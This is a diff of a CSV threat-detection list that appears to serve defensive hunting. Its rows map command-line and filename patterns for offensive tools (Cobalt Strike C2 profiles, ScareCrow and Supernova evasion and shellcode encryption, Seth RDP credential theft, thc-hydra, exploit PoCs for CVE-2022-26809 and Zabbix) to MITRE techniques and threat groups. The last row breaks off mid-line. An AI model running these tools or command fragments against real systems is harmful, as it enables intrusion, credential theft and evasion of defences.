-"*./RedGuard*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*./RedGuard*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*./redirector.py *","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","0","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*./rpcrt.py*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*./rsocx -*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" -"*./scan4all *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*./ScareCrow *","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*./ScareCrow -*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*./ScareCrow*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*./seth.sh * *","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" -"*./snake","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","113","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*./scan4all *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*./ScareCrow *","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*./ScareCrow -*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*./ScareCrow*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*./seth.sh * *","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*./snake","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*./SourcePoint *","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" -"*./sudomy*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1718","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" -"*./t14m4t *","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","0","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*./sudomy*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*./t14m4t *","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","0","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*./teamserver *","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","0","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" "*./teamserver *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*./update-beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*./update-beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*./Vegile*","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" -"*./xhydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*./xhydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" "*./xrkRce *","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","0","N/A","N/A","5","462","201","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" "*./zabbix.py*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/pykiller/CVE-2022-23131","1","1","N/A","N/A","1","0","0","2022-02-24T11:59:48Z","2022-02-24T11:34:27Z" "*./zexp check -*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/jweny/zabbix-saml-bypass-exp","1","0","N/A","N/A","1","94","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z" @@ -2222,18 +2222,18 @@ "*.api.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.apps.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.asreproast.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" -"*.athena_utils *","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*.athena_utils *","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*.beta.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*.bin -enc rc4 -lang c -k 3 -o *.bin*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*.bin -enc rc4 -lang csharp -k 9*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*.bin -enc rot -lang csharp -k 2 -d*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*.bin -enc rot -lang rust -k 7*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*.bin -enc xor -lang csharp -k 2 -v nickvourd*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*.bin -enc xor -lang nim -k 4*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" +"*.bin -enc rc4 -lang c -k 3 -o *.bin*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*.bin -enc rc4 -lang csharp -k 9*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*.bin -enc rot -lang csharp -k 2 -d*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*.bin -enc rot -lang rust -k 7*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*.bin -enc xor -lang csharp -k 2 -v nickvourd*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*.bin -enc xor -lang nim -k 4*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" "*.blog.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.BruteRatel*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 